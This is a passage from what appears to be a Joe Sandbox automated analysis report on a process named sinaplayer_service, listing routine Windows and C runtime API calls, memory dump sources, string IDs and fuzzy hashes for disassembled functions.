                                                                                                                                                                                                      • Part of subcall function 6C5C3D4A: InterlockedPopEntrySList.KERNEL32(?,?,6C5C29E9,00000000,?), ref: 6C5C3D54
                                                                                                                                                                                                      • Part of subcall function 6C5C3D4A: ??2@YAPAXI@Z.MSVCR120(00000010,?,6C5C29E9,00000000,?), ref: 6C5C3D69
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000), ref: 6C5C2AF6
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,Function_000DCEE8,00000000), ref: 6C5C2B0B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base::ChoreConcurrency::details::EntryExceptionInterlockedListRealizedSchedulerThrowstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2878774513-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,00000000,?,?,?,?,6C5CAB93,?,?,?), ref: 6C5CAD53
                                                                                                                                                                                                    • InterlockedPushEntrySList.KERNEL32(?,?,?,?,?,?,6C5CAB93,?,?,?), ref: 6C5CAD6A
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,?,?,?,?,6C5CAB93,?,?,?), ref: 6C5CAD71
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,?,6C5CAB93,?,?,?), ref: 6C5CADA0
                                                                                                                                                                                                    • Concurrency::details::SafePointInvocation::InvokeAtNextSafePoint.LIBCMT ref: 6C5CADB5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$DepthInterlockedPointQuerySafe$Concurrency::details::EntryFlushInvocation::InvokeNextPush
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,?,00000000,00000070,?,?,6C5A1E37,00000000,?,00000000,?,?,-00000004,6C5C2C37,?,?), ref: 6C5BADB1
                                                                                                                                                                                                    • InterlockedPushEntrySList.KERNEL32(?,?,?,6C5A1E37,00000000,?,00000000,?,?,-00000004,6C5C2C37,?,?,-00000004,?,6C5BDEB3), ref: 6C5BADC6
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,?,6C5A1E37,00000000,?,00000000,?,?,-00000004,6C5C2C37,?,?,-00000004,?,6C5BDEB3,-00000004), ref: 6C5BADCD
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,6C5A1E37,00000000,?,00000000,?,?,-00000004,6C5C2C37,?,?,-00000004,?,6C5BDEB3,-00000004), ref: 6C5BADFC
                                                                                                                                                                                                    • Concurrency::details::SafePointInvocation::InvokeAtNextSafePoint.LIBCMT ref: 6C5BAE11
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$DepthInterlockedPointQuerySafe$Concurrency::details::EntryFlushInvocation::InvokeNextPush
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,6C580D31,?,?,?,?,00000000), ref: 6C5A40FA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,6C580D31,?,?,?,?,00000000), ref: 6C5A4104
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6C580D31,?,?,?,?,00000000), ref: 6C5A4110
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6C580D31,?,?,?,?,00000000), ref: 6C5A411A
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,6C580D31,?,?,?,?,00000000), ref: 6C5A4142
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,6C580D31,?,?,?,?,00000000), ref: 6C5A4149
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6C5CAEA3
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000100,00000004,6C5BA14B,?,00000001,?,00000004,6C5C931D,?,?,6C5B923C,?,?,6C5C9215,?,?), ref: 6C5CAECB
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000100,00000004,6C5BA14B,?,00000001,?,00000004,6C5C931D,?,?,6C5B923C,?,?,6C5C9215,?,?), ref: 6C5CAEDA
                                                                                                                                                                                                    • memset.MSVCR120(6C5B9323,00000000,00000100,00000004,6C5BA14B,?,00000001,?,00000004,6C5C931D,?,?,6C5B923C,?,?,6C5C9215), ref: 6C5CAF06
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000100,6C5B9323,00000000,00000100,00000004,6C5BA14B,?,00000001,?,00000004,6C5C931D,?,?,6C5B923C,?), ref: 6C5CAF30
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000200,00000100,6C5B9323,00000000,00000100,00000004,6C5BA14B,?,00000001,?,00000004,6C5C931D,?,?,6C5B923C,?), ref: 6C5CAF3D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog3memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 747782440-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5F6C52
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5F6C8E
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5F6C5D
                                                                                                                                                                                                      • Part of subcall function 6C5F4670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6C5CB412,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5F4677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5F6C6E
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5F6C79
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5F6C99
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C570BAA
                                                                                                                                                                                                    • wcslen.MSVCR120(00000000,00000000,00000001,?,6C5CC767,0000002F,00000000), ref: 6C580E9E
                                                                                                                                                                                                    • calloc.MSVCR120(00000001,00000002,00000000,00000000,00000001,?,6C5CC767,0000002F,00000000), ref: 6C580EA9
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,00000001,00000000,00000000), ref: 6C580EBC
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6C5A6370
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5A639B
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo_invoke_watsoncallocwcscpy_swcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2591421054-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __freebuf.LIBCMT ref: 6C564F6E
                                                                                                                                                                                                      • Part of subcall function 6C564E60: free.MSVCR120(?,?,?,6C564F73,?,?), ref: 6C564E76
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?), ref: 6C564F74
                                                                                                                                                                                                    • _close.MSVCR120(00000000,?,?,?), ref: 6C564F7A
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5A53EC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5A53F7
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6C5A540E
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$__freebuf_close_errno_fileno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1586031509-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C5758DA: __EH_prolog3.LIBCMT ref: 6C5758E1
                                                                                                                                                                                                      • Part of subcall function 6C576F10: TlsAlloc.KERNEL32 ref: 6C576F16
                                                                                                                                                                                                    • TlsAlloc.KERNEL32(6C5648CA), ref: 6C576F52
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C5A2F79
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C5A2F90
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6C62CF40,6C62CF40,00000000), ref: 6C5A2F9F
                                                                                                                                                                                                    • TlsFree.KERNEL32(6C62CF40,6C62CF40,00000000), ref: 6C5A2FAB
                                                                                                                                                                                                    • TlsFree.KERNEL32(?,6C5CA5DB,?,?), ref: 6C5A2FBE
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocFree$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionH_prolog3LastThrow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 46841429-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • UnregisterWaitEx.KERNEL32(?,000000FF,00000000,00000063,0038E8EE,00000001), ref: 0038E284
                                                                                                                                                                                                    • UnregisterWaitEx.KERNEL32(?,000000FF,00000000,00000063,0038E8EE,00000001), ref: 0038E297
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2AE
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2B8
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2C2
                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCR120(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2C7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle$UnregisterWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1214919099-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,00000001,00000000), ref: 6C578B1D
                                                                                                                                                                                                    • ___crtGetStringTypeA.LIBCMT ref: 6C578B71
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,FE90005A,00000100,00000020,00000100,?,00000100,5EFC4D8B,00000000,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 6C578B92
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,FE90005A,00000200,00000020,00000100,?,00000100,5EFC4D8B,00000000), ref: 6C578BBA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$__crt$InfoType___crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3423027535-3916222277
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,00374F50,?,?,?,?,?,?,003722E9,?,?,00000000), ref: 00374E5A
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,?,?,00374F50,?,?,?,?,?,?,003722E9,?,?,00000000), ref: 00374E7E
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,00000000,?,00000000,?,?,?,?,00374F50,?,?,?,?,?), ref: 00374EC3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@Xout_of_range@std@@memcpy
                                                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                                                    • API String ID: 4248180022-4289949731
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcspbrk.LIBCMT(00EC4446,6C582CB8,?,6C631218,6C582DD4), ref: 6C582C85
                                                                                                                                                                                                    • _wmatch.LIBCMT ref: 6C5A3E9F
                                                                                                                                                                                                      • Part of subcall function 6C582C27: _malloc_crt.MSVCR120(00000008,?,6C5CC85C,00000000,00000000,00000000,00000001,00000000), ref: 6C582C2C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _malloc_crt_wcspbrk_wmatch
                                                                                                                                                                                                    • String ID: HD
                                                                                                                                                                                                    • API String ID: 2060052928-3471098148
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: fscanf_s$fgets
                                                                                                                                                                                                    • String ID: %d$GBP1
                                                                                                                                                                                                    • API String ID: 1025516267-3547967902
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long,?,?,?,003747A0,00000001,?,?,?,00372D7F,-00000002,?), ref: 00374764
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000001,?,?,?,003747A0,00000001,?,?,?,00372D7F,-00000002,?), ref: 0037476B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Xlength_error@std@@
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 373104503-3788999226
                                                                                                                                                                                                    • Opcode ID: a25ef0043a4c6dfe076732c69720be325c96cf14cb5d26abac88a9115fa76409
                                                                                                                                                                                                    • Instruction ID: 9014b6de120fb3feee6771122e1b9323fc323bfc1d97bb131185fdc005bbc45a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a25ef0043a4c6dfe076732c69720be325c96cf14cb5d26abac88a9115fa76409
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4211E5B21006146BC7219F99E881A97F7ECEF96320F00802BEA6DC7240E775F441CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __output_l.LIBCMT ref: 6C566F2A
                                                                                                                                                                                                      • Part of subcall function 6C566C0F: _errno.MSVCR120(?,?,?,00000000), ref: 6C566C84
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5A59E6
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5A59F1
                                                                                                                                                                                                    • _flsbuf.MSVCR120(00000000,?), ref: 6C5A5A03
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__output_l_flsbuf_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: B
                                                                                                                                                                                                    • API String ID: 531506805-1255198513
                                                                                                                                                                                                    • Opcode ID: ff60e6265110582dff214c53019b6cac8ee69f181b0041a41a1a6057d0b1586c
                                                                                                                                                                                                    • Instruction ID: e1cf28fd3e63b4c6378d145667fe75a1e55aa06e69d25a169f59ac9a77f95bc8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff60e6265110582dff214c53019b6cac8ee69f181b0041a41a1a6057d0b1586c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1201A57190420DDFDB009EA9DC409EEB7B8FB08328F10026AE924E6690EB359905CBA4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(00000003), ref: 0037FD27
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FD5C
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FD69
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$??3@Append@Get@PathPath@base@@@Service@@U?$char_traits@_V01@V01@@V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@
                                                                                                                                                                                                    • String ID: player_resources.pak
                                                                                                                                                                                                    • API String ID: 1085834238-1294963580
                                                                                                                                                                                                    • Opcode ID: 0a0708c5ec326743e535240693e426d0e0a5526542ede0f212d547f28ce7f9c4
                                                                                                                                                                                                    • Instruction ID: 22d981049fbe5fcc9edbb1d896ffc11f89fba05d0bf27821bf07df543a19284c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a0708c5ec326743e535240693e426d0e0a5526542ede0f212d547f28ce7f9c4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9001D231908218CEDF66EB64C8197DDBB78EF15314F0001DAD40E67280CF341B48CB10
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(00000003), ref: 0037FEBA
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FEEF
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FEFC
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$??3@Append@Get@PathPath@base@@@Service@@U?$char_traits@_V01@V01@@V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@
                                                                                                                                                                                                    • String ID: sinaclient.dll
                                                                                                                                                                                                    • API String ID: 1085834238-3029616156
                                                                                                                                                                                                    • Opcode ID: 464d1e481c4d76c05a4b9585e533f879b2b983688198d449c97f019a13bdafff
                                                                                                                                                                                                    • Instruction ID: 4b92a31a402abe6d88876f57cf75d34ee8930ddaa0d4a4f97c2e9ea5b1c7c870
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 464d1e481c4d76c05a4b9585e533f879b2b983688198d449c97f019a13bdafff
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D501F131A0421C9EDF26EBA4DC597DDBBB8FF16314F0000DAD44AA7281CB711A48CF61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: rand$swprintf_s
                                                                                                                                                                                                    • String ID: %s%08X%08X$---------------------------
                                                                                                                                                                                                    • API String ID: 2316684710-1747277357
                                                                                                                                                                                                    • Opcode ID: 168e1f9deee02f32614e0a0e7d1c305c95179124a6993b2f35d5f7b927138b57
                                                                                                                                                                                                    • Instruction ID: ac3242b999a3e7ae4282628f47ebf28dfaacff326474d94e30def0702871360b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 168e1f9deee02f32614e0a0e7d1c305c95179124a6993b2f35d5f7b927138b57
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2F06D75B00308ABCB01EFF8DC8A9AEB7BCEB48711F40056AE809DB240EA7599048751
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120 ref: 6C5CAE28
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6C5CAE60
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(Lu[lpx[l,Function_000DCEE8,?), ref: 6C5CAE75
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
